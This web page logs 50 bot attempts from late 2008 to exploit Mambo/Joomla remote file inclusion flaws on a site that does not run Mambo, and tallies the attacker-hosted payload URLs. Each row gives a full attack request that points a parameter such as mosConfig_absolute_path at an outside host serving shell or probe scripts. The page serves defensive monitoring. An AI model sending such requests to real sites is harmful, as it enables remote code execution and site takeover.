The hackers are still trying to exploit the Mambo mosConfig exploit from 2004.
Below is the list of the last 50 attempts to exploit this on the pigstye computers. Of course Mambo has never been used on this network, so all attempts are probably by bots.
| Date | IP | Host | Attempt | Count |
|---|
| 2008-12-01 11:29:08 | 200.155.18.50 | gizmo.rits.org.br | GET /staticpages/index.php/mambomosconfig/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1 | 93 |
| 2008-12-01 10:19:55 | 66.160.185.20 | 66.160.185.20 | GET /staticpages/index.php/mambomosconfig//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1 | 29 |
| 2008-12-01 09:29:49 | 190.134.149.59 | r190-134-149-59.dialup.adsl.anteldata.net.uy | GET /lamer.php?order=ip&page=2//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1 | 8 |
| 2008-12-01 09:23:06 | 85.214.17.211 | h278148.serverkompetenz.net | GET /staticpages/index.php/mambomosconfig/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bengoerz.net/tst.txt?? HTTP/1.1 | 36 |
| 2008-12-01 08:55:33 | 78.143.46.138 | serv38.pro-xhost.com | GET /staticpages/index.php/mambomosconfig//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playallsongs.com/install/idomila.txt??? HTTP/1.1 | 5 |
| 2008-12-01 08:41:02 | 62.48.219.29 | 62.48.219.29 | GET /staticpages/index.php/mambomosconfig//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1 | 5 |
| 2008-12-01 08:30:56 | 83.98.237.208 | ip5362edd0.speedxs.nl | GET /staticpages/index.php/mambomosconfig/print%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://jonyrulz.com/c99/fx29id1.txt? HTTP/1.1 | 8 |
| 2008-12-01 07:09:06 | 72.52.170.160 | host.tamm.com.sa | GET /staticpages/index.php//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idfeel.txt?? HTTP/1.1 | 29 |
| 2008-12-01 06:54:34 | 66.244.236.243 | h66-244-236-243.bigpipeinc.com | GET /staticpages/index.php//?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1 | 50 |
| 2008-12-01 06:44:34 | 85.214.47.24 | stunthuhn.de | GET /staticpages/index.php/mambomosconfig//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://playallsongs.com/install/idomila.txt??? HTTP/1.1 | 10 |
| 2008-12-01 06:28:48 | 203.231.35.38 | 203.231.35.38 | GET /staticpages/index.php/mambomosconfig//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.newindianmodels.com/b1ttletX.txt??? HTTP/1.1 | 134 |
| 2008-12-01 06:10:01 | 222.122.140.40 | 222.122.140.40 | GET /staticpages/index.php/mambomosconfig/…//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1 | 15 |
| 2008-12-01 05:54:28 | 212.159.7.155 | ccgi03.plus.net | GET /staticpages/index.php/mambomosconfig//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1 | 11 |
| 2008-12-01 04:54:40 | 195.137.143.11 | trading02.tzm.net | GET /article.php/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.1 | 16 |
| 2008-12-01 04:50:27 | 207.178.128.116 | jupiter.noc.iswest.net | GET /staticpages/index.php/mambomosconfig/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.phoenixgc.net/help/bo.do?? HTTP/1.1 | 229 |
| 2008-12-01 03:55:37 | 91.192.20.164 | 91.192.20.164 | GET /staticpages/index.php//components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.duvase.com.ar/components/com_joomla/bot.txt?? HTTP/1.1 | 9 |
| 2008-12-01 03:28:21 | 209.90.77.55 | cp21.heritagewebdesign.com | GET /article.php/20070413095639935/print/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.phoenixgc.net/help/bo.do?? HTTP/1.1 | 16 |
| 2008-12-01 03:24:05 | 64.38.51.98 | ksded.caxy.com | GET /article.php/20070413095639935/print/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.gregolsen.jp/bo.do?? HTTP/1.1 | 11 |
| 2008-12-01 03:15:52 | 89.111.180.85 | c137.colo.hc.ru | GET /staticpages/index.php/mambomosconfig/print/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.1 | 18 |
| 2008-12-01 03:05:53 | 201.159.66.178 | 201.159.66.178 | GET /staticpages/index.php//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1 | 6 |
| 2008-12-01 01:57:45 | 74.53.7.20 | 14.7.354a.static.theplanet.com | GET /staticpages/index.php/mambomosconfig/print/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1 | 16 |
| 2008-12-01 00:47:29 | 201.3.132.147 | 201-3-132-147-paebv300.ipd.brasiltelecom.net.br | GET /staticpages/index.php/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1 | 4 |
| 2008-11-30 20:41:06 | 82.102.10.26 | ns1.dnserver.info | GET /staticpages/index.php/mambomosconfig//errors.php?error=http://wolfd.com/joomwolftec1/readme???? HTTP/1.1 | 510 |
| 2008-11-30 17:27:22 | 75.145.110.100 | 75-145-110-100-Memphis.hfc.comcastbusiness.net | GET /lamer.php?order=ip&page=2%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1 | 35 |
| 2008-11-30 15:41:42 | 195.221.254.1 | castor2.fcomte.iufm.fr | GET /staticpages/index.php/mambomosconfig/print//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1 | 8 |
| 2008-11-30 14:24:51 | 217.27.212.6 | retek.darkangel.hu | GET /staticpages/index.php/mambomosconfig/print//home/www/public_html/rgboard/include=http://n0b0dys1t3.iespana.es/cmd.txt???? HTTP/1.1 | 45 |
| 2008-11-30 13:54:23 | 205.134.240.162 | ld34.inmotionhosting.com | GET /staticpages/index.php/mambomosconfig%20//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://perazimmedia.com/helpdesk/readme.txt???? HTTP/1.1 | 5 |
| 2008-11-30 13:20:13 | 210.188.201.145 | sv125.xserver.jp | GET /staticpages/index.php/mambomosconfig//errors.php?error=http://n0b0dys1t3.iespana.es/cmd.txt???? HTTP/1.1 | 6 |
| 2008-11-30 12:29:45 | 82.146.59.116 | highraiser.com | GET /staticpages/index.php/mambomosconfig/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.1 | 15 |
| 2008-11-30 10:10:00 | 85.114.132.122 | c122.cyan.fastwebserver.de | GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.turkocagi.org.tr/test.txt? HTTP/1.1 | 7 |
| 2008-11-30 09:45:57 | 209.85.106.36 | mail.ritechhosting.com | GET /staticpages/index.php/index/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://evy.siteburg.com/ed.txt?? HTTP/1.1 | 10 |
| 2008-11-30 09:30:04 | 69.50.213.186 | linkneo.com | GET /staticpages/index.php/mambomosconfig/print//?_zb_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1 | 26 |
| 2008-11-30 09:30:03 | 211.171.202.85 | 211.171.202.85 | GET //administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=http://gio90.thewomanizer.net/id.txt??? HTTP/1.1 | 117 |
| 2008-11-30 07:42:50 | 216.75.35.118 | su1035118.aspadmin.net | GET /staticpages/index.php//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/inc?? HTTP/1.1 | 938 |
| 2008-11-30 07:14:32 | 82.135.199.29 | 82-135-199-29.static.zebra.lt | GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.uralitel.ru/en/search/cmd.txt??????? HTTP/1.1 | 19 |
| 2008-11-30 07:13:28 | 210.222.18.103 | 210.222.18.103 | GET /staticpages/index.php/mambomosconfig//components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1 | 84 |
| 2008-11-30 07:07:05 | 124.0.210.117 | 124.0.210.117 | GET /article.php///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rankdate.com/investigate/phpfox.txt?? HTTP/1.1 | 32 |
| 2008-11-30 07:05:27 | 222.122.52.80 | churchtown.treem.co.kr | GET /article.php///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1 | 10 |
| 2008-11-30 06:44:33 | 222.236.47.146 | 222.236.47.146 | GET /article.php///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1 | 5 |
| 2008-11-30 06:30:17 | 83.64.250.242 | ms02.schabkar.com | GET /staticpages/index.php/mambomosconfig%20%20//include/bbs.lib.inc.php?site_path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1 | 11 |
| 2008-11-30 05:11:46 | 211.51.221.135 | 211.51.221.135 | GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1 | 10 |
| 2008-11-30 03:55:57 | 65.18.169.40 | kmc.luckydays.com | GET /staticpages/index.php/mambomosconfig/errors.php?error=http://www.diplom.nu/templates_c/id.txt? HTTP/1.1 | 43 |
| 2008-11-30 01:26:23 | 212.143.3.70 | ns1.fav.co.il | GET /staticpages/index.php/mambomosconfig//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1 | 12 |
| 2008-11-30 01:01:53 | 189.38.57.194 | colocation.carrosnaserra.com.br | GET /staticpages/index.php/mambomosconfig/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1 | 6 |
| 2008-11-30 00:47:10 | 82.130.231.243 | 243.82-130-231.dynamic.clientes.euskaltel.es | GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.anboactief.nl/uploads/sfx.txt?? HTTP/1.1 | 3 |
| 2008-11-30 00:28:49 | 212.108.64.58 | server2.web.tibus.net | GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1 | 16 |
| 2008-11-30 00:28:49 | 212.108.64.58 | server2.web.tibus.net | GET /administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.peb.com.ua/coin/readme.txt?? HTTP/1.1 | 16 |
| 2008-11-30 00:23:58 | 65.18.192.85 | wildrivernet4.wildrivernet4.com | GET /article.php/20070413095639935/print/components/com_performs/performs.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1 | 17 |
| 2008-11-30 00:23:06 | 202.142.223.164 | 202.142.223.164.colo.isp-thailand.com | GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.g0v4z.kit.net/x/arab.txt?? HTTP/1.1 | 28 |
| 2008-11-29 20:27:21 | 66.7.214.132 | server.mix-online.org | GET /staticpages/index.php/mambomosconfig//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://forum.happybass.com/idf.txt?? HTTP/1.1 | 20 |
| Hack Destination Computers | # of Attempts |
|---|
| http://125.250.78.194/rgboard/manual/.../sistem.txt??? | 37 |
| http://javva.com/id.txt? | 25 |
| http://www.guidingbrightminds.com/phpbb/templates/subSilver/inc_ssl.txt?? | 22 |
| http://208.42.97.97/blog/id.gif? | 21 |
| http://www.pass100.co.kr/LykBoard/image.gif???? | 20 |
| http://220.134.244.157/xoops/templates_c/id3.txt? | 20 |
| http://lansites.ru//language/lang_english/test.txt??? | 17 |
| http://oursoultvxq.com/bbs/data/vip/id.txt?? | 17 |
| http://r00tcrew.webcindario.com/id.txt??? | 14 |
| 14 |
| http://apai.100megsfree8.com/id.gif? | 14 |
| http://lnx.padellino.com/prc.gif? | 13 |
| http://apachi.100megsfree8.com/id.gif? | 11 |
| http://x0x1.webcindario.com/tst.txt?? | 11 |
| http://sfunion.com/echot/data/action/act.txt?? | 10 |
| http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? | 10 |
| http://apai.net46.net/id.gif? | 10 |
| http://www.sexery.de/prc.gif? | 9 |
| http://r3df0x.altervista.org/ddoss.txt???? | 9 |
| http://pcpinformatica.com.br/fx29id1.txt?? | 9 |
| http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? | 9 |
| http://www.samilglass.com/images/v6id.txt??? | 9 |
| http://motookazja.com.pl/admin/libs/config.txt?? | 9 |
| http://store.at.ua/test.txt?? | 9 |
| http://www.codeduc.cl/components/id.txt???? | 9 |
| http://www.herbsall.4yz.com/images/b?? | 9 |
| http://rox4ever.t35.com/TT?? | 8 |
| http://markin.siteburg.com/id.txt??? | 8 |
| http://www.newminiclub.nl/copyright.txt?? | 8 |
| http://ubintu.100megsfree8.com/id.gif? | 8 |
| http://www.autosate.ru/images/borda.jpg? | 8 |
| http://www.apnic.net/index.html? | 8 |
| http://www.dalycityrecords.com/ids.txt?? | 8 |
| http://www.clever-gesundbleiben.de/templates/.../sistem.txt??? | 8 |
| http://dhcom.co.kr/zboard/id.txt?? | 7 |
| http://www.itpro-ua.com/dotproject//images/.bash/id.txt? | 7 |
| http://usuarios.lycos.es/zxczxc/id.txt???? | 7 |
| http://www.l2reloaded.org/robots.txt??? | 7 |
| http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? | 7 |
| http://www.ganzkoerperpflege.at/files/oye.txt?? | 7 |
| http://www.cdpm3.com/id.txt? | 7 |
| http://www.mymudpie.com/dlk/sistem.txt?? | 7 |
| http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? | 7 |
| http://30stm.dk/v2/error/copyright.txt?? | 7 |
| http://dark912.altervista.org/id1.txt? | 7 |
| http://www.efnetbr.t35.com/test.txt? | 6 |
| http://www.dindondago.it/l333tbi1tX.txt???? | 6 |
| http://addictivebehavior.net/h.dat?&list=1&cmd=id | 6 |
| http://www.phdcursos.com.br/http/idd.txt? | 6 |
| http://www.mykr.net/bbs/id.txt? | 6 |
Security Issues and Spam
